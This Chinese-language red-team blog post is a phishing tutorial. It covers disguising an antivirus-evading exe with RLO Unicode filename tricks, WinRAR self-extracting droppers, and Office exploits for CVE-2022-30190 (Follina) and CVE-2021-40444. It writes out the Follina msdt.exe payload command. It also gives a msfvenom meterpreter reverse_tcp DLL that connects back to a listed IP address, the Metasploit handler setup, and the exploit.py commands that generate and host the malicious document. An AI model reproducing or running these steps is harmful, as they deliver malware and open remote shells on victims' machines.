【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑

简介: 【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑

文件后缀-钓鱼伪装-RLO

经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图

成功上线

后续修改图标,进行钓鱼伪装


压缩文件-自解压-释放执行

演示环境:Winrar压缩软件


打包后进行RLO隐藏,主要是免杀问题

Office套件-CVE漏洞-MSF&CS

Microsoft MSDT CVE-2022-30190 代码执行


https://github.com/JohnHammond/msdt-follina

该问题首次发现在2022年5月27日,由白俄罗斯的一个IP地址上传。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,

通过ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。

此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。

目前已知影响的版本为:

office 2021 Lts office 2019 office 2016 Office 2013 Office ProPlus Office 365

测试:

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"


复现上线CS:

https://github.com/JohnHammond/msdt-follina

1、生成后门上传

2、构造下载地址

3、修改代码下载

4、生成恶意文档


Microsoft MSHTML CVE-2021-40444 远程代码执行

https://github.com/lockedbyte/CVE-2021-40444


影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本


1、安装依赖:

apt-get install lcab


2、生成DLL:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=9999 -f dll > shell.dll

3、监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
run

4、生成文档:

cp shell.dll CVE-2021-40444
cd CVE-2021-40444
python3 exploit.py generate shell.dll http://47.94.236.117:10000

5、监听文档:

python3 exploit.py host 10000

6、取出文档执行测试

CVE-2017-11882

影响版本:

office 2003 office 2007 office 2010 office 2013 office 2016

相关文章
|
Prometheus 监控 安全
SpringBoot Actuator未授权访问漏洞的解决方法
SpringBoot Actuator未授权访问漏洞的解决方法Actuator 是 SpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。
29406 0
|
缓存 Linux
CentOS7配置阿里yum源 超详细!!!
CentOS7配置阿里yum源 超详细!!!
32122 2
|
Docker 容器 数据格式
Docker 修改镜像源地址
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_34173549/article/details/80417198 我的Docker 版本为 1.
42231 0
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
2015 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
Java Linux PHP
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
268 1
|
SQL 安全 Go
【Go语言专栏】Go语言中的安全审计与漏洞修复
【4月更文挑战第30天】本文介绍了Go语言中的安全审计和漏洞修复实践。安全审计包括代码审查、静态分析、运行时分析、渗透测试和专业服务,借助工具如`go vet`、`staticcheck`、`gosec`等。修复漏洞的方法涉及防止SQL注入、XSS攻击、CSRF、不安全反序列化等。遵循最小权限原则、输入验证等最佳实践,结合持续学习,可提升Go应用安全性。参考[Go安全工作组](https://github.com/golang/security)和[OWASP Top 10](https://owasp.org/www-project-top-ten/)深入学习。
366 0
|
应用服务中间件 数据库连接 数据安全/隐私保护
MSSQL绕过360提权实战案例
MSSQL绕过360提权实战案例
470 2
|
小程序 前端开发 程序员
微信小程序开发入门教程-小程序账号注册及开通
微信小程序开发入门教程-小程序账号注册及开通
|
安全 前端开发 Java
struts2-046 远程代码执行 (CVE-2017-5638)
struts2-046 远程代码执行 (CVE-2017-5638)
833 0
struts2-046 远程代码执行 (CVE-2017-5638)
|
数据中心 Windows
Windows Server 2012 R2 安装密钥
Windows Server 2012 R2 安装密钥(只适用安装,不支持激活) 标准版 = NB4WH-BBBYV-3MPPC-9RCMV-46XCB数据中心版 = BH9T4-4N7CW-67J3M-64J36-WW98Y M98WF-NY2PP-73243-PC8R6-V6B...
7759 0